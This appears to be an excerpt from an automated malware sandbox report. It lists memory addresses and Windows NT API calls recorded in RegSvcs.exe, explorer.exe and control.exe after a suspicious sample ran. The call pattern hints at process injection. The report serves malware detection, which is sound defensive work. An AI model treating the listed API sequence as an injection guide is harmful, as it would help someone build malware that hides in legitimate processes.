Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_019D2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_019D2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_019D2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2F90 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_019D2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2FB0 NtResumeThread,LdrInitializeThunk,	5_2_019D2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2FE0 NtCreateFile,LdrInitializeThunk,	5_2_019D2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2F30 NtCreateSection,LdrInitializeThunk,	5_2_019D2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_019D2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_019D2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D4340 NtSetContextThread,	5_2_019D4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D4650 NtSuspendThread,	5_2_019D4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2B80 NtQueryInformationFile,	5_2_019D2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2BA0 NtEnumerateValueKey,	5_2_019D2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2BE0 NtQueryValueKey,	5_2_019D2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2AB0 NtWaitForSingleObject,	5_2_019D2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2AF0 NtWriteFile,	5_2_019D2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2DB0 NtEnumerateKey,	5_2_019D2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2D00 NtSetInformationFile,	5_2_019D2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2CC0 NtQueryVirtualMemory,	5_2_019D2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2CF0 NtOpenProcess,	5_2_019D2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2C00 NtQueryInformationProcess,	5_2_019D2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2C60 NtCreateKey,	5_2_019D2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2FA0 NtQuerySection,	5_2_019D2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2F60 NtCreateProcessEx,	5_2_019D2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2EE0 NtQueueApcThread,	5_2_019D2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D2E30 NtWriteVirtualMemory,	5_2_019D2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D3090 NtSetValueKey,	5_2_019D3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D3010 NtOpenDirectoryObject,	5_2_019D3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D35C0 NtCreateMutant,	5_2_019D35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D39B0 NtGetContextThread,	5_2_019D39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D3D10 NtOpenProcessToken,	5_2_019D3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D3D70 NtOpenThread,	5_2_019D3D70
Source: C:\Windows\explorer.exe	Code function: 6_2_0F986E12 NtProtectVirtualMemory,	6_2_0F986E12
Source: C:\Windows\explorer.exe	Code function: 6_2_0F985232 NtCreateFile,	6_2_0F985232
Source: C:\Windows\explorer.exe	Code function: 6_2_0F986E0A NtProtectVirtualMemory,	6_2_0F986E0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82CA0 NtQueryInformationToken,LdrInitializeThunk,	8_2_04E82CA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82C60 NtCreateKey,LdrInitializeThunk,	8_2_04E82C60
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82C70 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_04E82C70
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82DF0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_04E82DF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82DD0 NtDelayExecution,LdrInitializeThunk,	8_2_04E82DD0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82D10 NtMapViewOfSection,LdrInitializeThunk,	8_2_04E82D10
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_04E82EA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82FE0 NtCreateFile,LdrInitializeThunk,	8_2_04E82FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82F30 NtCreateSection,LdrInitializeThunk,	8_2_04E82F30
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82AD0 NtReadFile,LdrInitializeThunk,	8_2_04E82AD0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82BE0 NtQueryValueKey,LdrInitializeThunk,	8_2_04E82BE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_04E82BF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82B60 NtClose,LdrInitializeThunk,	8_2_04E82B60
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E835C0 NtCreateMutant,LdrInitializeThunk,	8_2_04E835C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E84650 NtSuspendThread,	8_2_04E84650
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E84340 NtSetContextThread,	8_2_04E84340
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82CF0 NtOpenProcess,	8_2_04E82CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82CC0 NtQueryVirtualMemory,	8_2_04E82CC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82C00 NtQueryInformationProcess,	8_2_04E82C00
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82DB0 NtEnumerateKey,	8_2_04E82DB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82D30 NtUnmapViewOfSection,	8_2_04E82D30
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82D00 NtSetInformationFile,	8_2_04E82D00
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82EE0 NtQueueApcThread,	8_2_04E82EE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82E80 NtReadVirtualMemory,	8_2_04E82E80
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82E30 NtWriteVirtualMemory,	8_2_04E82E30
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82FA0 NtQuerySection,	8_2_04E82FA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82FB0 NtResumeThread,	8_2_04E82FB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82F90 NtProtectVirtualMemory,	8_2_04E82F90
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82F60 NtCreateProcessEx,	8_2_04E82F60
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82AF0 NtWriteFile,	8_2_04E82AF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82AB0 NtWaitForSingleObject,	8_2_04E82AB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82BA0 NtEnumerateValueKey,	8_2_04E82BA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E82B80 NtQueryInformationFile,	8_2_04E82B80
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E83090 NtSetValueKey,	8_2_04E83090
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E83010 NtOpenDirectoryObject,	8_2_04E83010
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E83D70 NtOpenThread,	8_2_04E83D70
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E83D10 NtOpenProcessToken,	8_2_04E83D10
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E839B0 NtGetContextThread,	8_2_04E839B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00CDA350 NtCreateFile,	8_2_00CDA350
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00CDA480 NtClose,	8_2_00CDA480
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00CDA400 NtReadFile,	8_2_00CDA400
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00CDA530 NtAllocateVirtualMemory,	8_2_00CDA530
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00CDA47C NtClose,	8_2_00CDA47C
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_00CDA52C NtAllocateVirtualMemory,	8_2_00CDA52C

Source: C:\Users\user\Desktop\z2______________________________.exe	Code function: 0_2_04C40CA8	0_2_04C40CA8
Source: C:\Users\user\Desktop\z2______________________________.exe	Code function: 0_2_04C41A62	0_2_04C41A62
Source: C:\Users\user\Desktop\z2______________________________.exe	Code function: 0_2_04C41A70	0_2_04C41A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0040102C	5_2_0040102C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041DB2A	5_2_0041DB2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00402D87	5_2_00402D87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041D596	5_2_0041D596
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00409E4B	5_2_00409E4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00409E50	5_2_00409E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041DE5E	5_2_0041DE5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041E7A0	5_2_0041E7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A541A2	5_2_01A541A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A601AA	5_2_01A601AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A581CC	5_2_01A581CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01990100	5_2_01990100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3A118	5_2_01A3A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A28158	5_2_01A28158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A32000	5_2_01A32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A603E6	5_2_01A603E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019AE3F0	5_2_019AE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5A352	5_2_01A5A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A202C0	5_2_01A202C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A40274	5_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A60591	5_2_01A60591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0535	5_2_019A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A4E4F6	5_2_01A4E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A44420	5_2_01A44420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A52446	5_2_01A52446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199C7C0	5_2_0199C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C4750	5_2_019C4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0770	5_2_019A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BC6E0	5_2_019BC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A6A9A6	5_2_01A6A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A29A0	5_2_019A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B6962	5_2_019B6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019868B8	5_2_019868B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CE8F0	5_2_019CE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A2840	5_2_019A2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019AA840	5_2_019AA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A56BD7	5_2_01A56BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5AB40	5_2_01A5AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199EA80	5_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B8DBF	5_2_019B8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199ADE0	5_2_0199ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019AAD00	5_2_019AAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3CD1F	5_2_01A3CD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A40CB5	5_2_01A40CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01990CF2	5_2_01990CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0C00	5_2_019A0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1EFA0	5_2_01A1EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01992FC8	5_2_01992FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A42F30	5_2_01A42F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C0F30	5_2_019C0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019E2F28	5_2_019E2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A14F40	5_2_01A14F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B2E90	5_2_019B2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5CE93	5_2_01A5CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5EEDB	5_2_01A5EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5EE26	5_2_01A5EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0E59	5_2_019A0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019AB1B0	5_2_019AB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A6B16B	5_2_01A6B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198F172	5_2_0198F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D516C	5_2_019D516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5F0E0	5_2_01A5F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A570E9	5_2_01A570E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A70C0	5_2_019A70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A4F0CC	5_2_01A4F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019E739A	5_2_019E739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5132D	5_2_01A5132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198D34C	5_2_0198D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A52A0	5_2_019A52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A412ED	5_2_01A412ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BB2C0	5_2_019BB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BD2F0	5_2_019BD2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3D5B0	5_2_01A3D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A695C3	5_2_01A695C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A57571	5_2_01A57571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5F43F	5_2_01A5F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01991460	5_2_01991460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5F7B0	5_2_01A5F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A516CC	5_2_01A516CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019E5630	5_2_019E5630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A35910	5_2_01A35910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A9950	5_2_019A9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BB950	5_2_019BB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A38E0	5_2_019A38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0D800	5_2_01A0D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BFB80	5_2_019BFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A15BF0	5_2_01A15BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019DDBF9	5_2_019DDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5FB76	5_2_01A5FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A41AA3	5_2_01A41AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3DAAC	5_2_01A3DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019E5AA0	5_2_019E5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A4DAC6	5_2_01A4DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A13A6C	5_2_01A13A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A57A46	5_2_01A57A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5FA49	5_2_01A5FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BFDC0	5_2_019BFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A57D73	5_2_01A57D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A3D40	5_2_019A3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A51D5A	5_2_01A51D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5FCF2	5_2_01A5FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A19C32	5_2_01A19C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A1F92	5_2_019A1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5FFB1	5_2_01A5FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01963FD5	5_2_01963FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01963FD2	5_2_01963FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A5FF09	5_2_01A5FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A9EB0	5_2_019A9EB0
Source: C:\Windows\explorer.exe	Code function: 6_2_0F384B30	6_2_0F384B30
Source: C:\Windows\explorer.exe	Code function: 6_2_0F384B32	6_2_0F384B32
Source: C:\Windows\explorer.exe	Code function: 6_2_0F38A232	6_2_0F38A232
Source: C:\Windows\explorer.exe	Code function: 6_2_0F387912	6_2_0F387912
Source: C:\Windows\explorer.exe	Code function: 6_2_0F381D02	6_2_0F381D02
Source: C:\Windows\explorer.exe	Code function: 6_2_0F38D5CD	6_2_0F38D5CD
Source: C:\Windows\explorer.exe	Code function: 6_2_0F389036	6_2_0F389036
Source: C:\Windows\explorer.exe	Code function: 6_2_0F380082	6_2_0F380082
Source: C:\Windows\explorer.exe	Code function: 6_2_0F985232	6_2_0F985232
Source: C:\Windows\explorer.exe	Code function: 6_2_0F9885CD	6_2_0F9885CD
Source: C:\Windows\explorer.exe	Code function: 6_2_0F982912	6_2_0F982912
Source: C:\Windows\explorer.exe	Code function: 6_2_0F97CD02	6_2_0F97CD02
Source: C:\Windows\explorer.exe	Code function: 6_2_0F97FB32	6_2_0F97FB32
Source: C:\Windows\explorer.exe	Code function: 6_2_0F97FB30	6_2_0F97FB30
Source: C:\Windows\explorer.exe	Code function: 6_2_0F97B082	6_2_0F97B082
Source: C:\Windows\explorer.exe	Code function: 6_2_0F984036	6_2_0F984036
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EFE4F6	8_2_04EFE4F6
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F02446	8_2_04F02446
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EF4420	8_2_04EF4420
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F10591	8_2_04F10591
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E50535	8_2_04E50535
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E6C6E0	8_2_04E6C6E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4C7C0	8_2_04E4C7C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E50770	8_2_04E50770
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E74750	8_2_04E74750
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE2000	8_2_04EE2000
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F081CC	8_2_04F081CC
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F041A2	8_2_04F041A2
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F101AA	8_2_04F101AA
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED8158	8_2_04ED8158
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E40100	8_2_04E40100
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EEA118	8_2_04EEA118
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED02C0	8_2_04ED02C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EF0274	8_2_04EF0274
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E5E3F0	8_2_04E5E3F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F103E6	8_2_04F103E6
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04F0A352	8_2_04F0A352
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E40CF2	8_2_04E40CF2
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EF0CB5	8_2_04EF0CB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E50C00	8_2_04E50C00
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4ADE0	8_2_04E4ADE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E68DBF	8_2_04E68DBF
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E5AD00	8_2_04E5AD00
